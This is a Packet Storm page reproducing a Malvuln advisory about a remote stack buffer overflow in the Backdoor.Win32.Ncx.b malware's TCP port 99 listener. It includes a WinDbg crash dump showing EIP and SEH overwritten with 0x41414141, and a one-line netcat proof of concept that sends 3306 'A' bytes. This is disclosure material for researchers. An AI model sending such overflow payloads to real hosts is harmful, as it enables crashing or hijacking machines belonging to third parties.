exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Backdoor.Win32.Ncx.b MVID-2021-0388 Buffer Overflow

Backdoor.Win32.Ncx.b MVID-2021-0388 Buffer Overflow
Posted Nov 5, 2021
Authored by malvuln | Site malvuln.com

Backdoor.Win32.Ncx.b malware suffers from a buffer overflow vulnerability.

tags | exploit, overflow
systems | windows
SHA-256 | de842114bff7044aacff49933ad7ecf0413dbb215c8efb1bc77300dd7112aa60

Backdoor.Win32.Ncx.b MVID-2021-0388 Buffer Overflow

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/885e74a43b4f7caec3cfb4dba0787de4.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Ncx.b
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 99. Third-party attackers who can reach an infected system can send a large junk payload and trigger a classic stack buffer overflow overwriting the EIP, ECX registers and structured exception handler (SEH).
Type: PE32
MD5: 885e74a43b4f7caec3cfb4dba0787de4
Vuln ID: MVID-2021-0388
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 11/04/2021

Memory Dump:
(ec.950): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000
eip=41414141 esp=03101660 ebp=03101680 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???

0:003> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Ncx.b.885e74a43b4f7caec3cfb4dba0787de4.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Ncx.b.885e74a43b4f7caec3cfb4dba0787de4.exe

FAULTING_IP:
Backdoor_Win32_Ncx_b_885e74a43b4f7caec3cfb4dba0787de4+1555
00401555 88443418 mov byte ptr [esp+esi+18h],al

EXCEPTION_RECORD: 031ff9f4 -- (.exr 0x31ff9f4)
ExceptionAddress: 00401555 (Backdoor_Win32_Ncx_b_885e74a43b4f7caec3cfb4dba0787de4+0x00001555)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 03200000
Attempt to write to address 03200000

PROCESS_NAME: Backdoor.Win32.Ncx.b.885e74a43b4f7caec3cfb4dba0787de4.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000008

EXCEPTION_PARAMETER2: 41414141

WRITE_ADDRESS: 41414141

FOLLOWUP_IP:
Backdoor_Win32_Ncx_b_885e74a43b4f7caec3cfb4dba0787de4+1555
00401555 88443418 mov byte ptr [esp+esi+18h],al

FAILED_INSTRUCTION_ADDRESS:
+1555
41414141 ?? ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

IP_ON_HEAP: 029c0b40
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT: 031ffa44 -- (.cxr 0x31ffa44)
eax=00000041 ebx=7745e250 ecx=4756178e edx=031ffdc4 esi=00000144 edi=029c0b40
eip=00401555 esp=031ffea4 ebp=740a1e90 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
Backdoor_Win32_Ncx_b_885e74a43b4f7caec3cfb4dba0787de4+0x1555:
00401555 88443418 mov byte ptr [esp+esi+18h],al ss:002b:03200000=??
Resetting default scope

FAULTING_THREAD: ffffffff

BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER: from 029c0b40 to 00401555

FRAME_ONE_INVALID: 1

STACK_TEXT:
031ffea4 00401555 backdoor_win32_ncx_b+0x1555
031ffea8 029c0b40 unknown!unknown+0x0


STACK_COMMAND: .cxr 00000000031FFA44 ; kb ; dds 31ffea4 ; kb

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: backdoor_win32_ncx_b+1555

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_Ncx_b_885e74a43b4f7caec3cfb4dba0787de4

IMAGE_NAME: Backdoor.Win32.Ncx.b.885e74a43b4f7caec3cfb4dba0787de4.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 34ae8eb9

BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_ncx_b+1555

FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Ncx.b.885e74a43b4f7caec3cfb4dba0787de4.exe!Unknown

Followup: MachineOwner
---------

0:003> !exchain
031ff904: ntdll!ExecuteHandler2+44 (77729d70)
031fffcc: 41414141
Invalid exception stack at 41414141


Exploit/PoC:
python -c "print('A'*3306)" | nc64.exe x.x.x.x 99
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close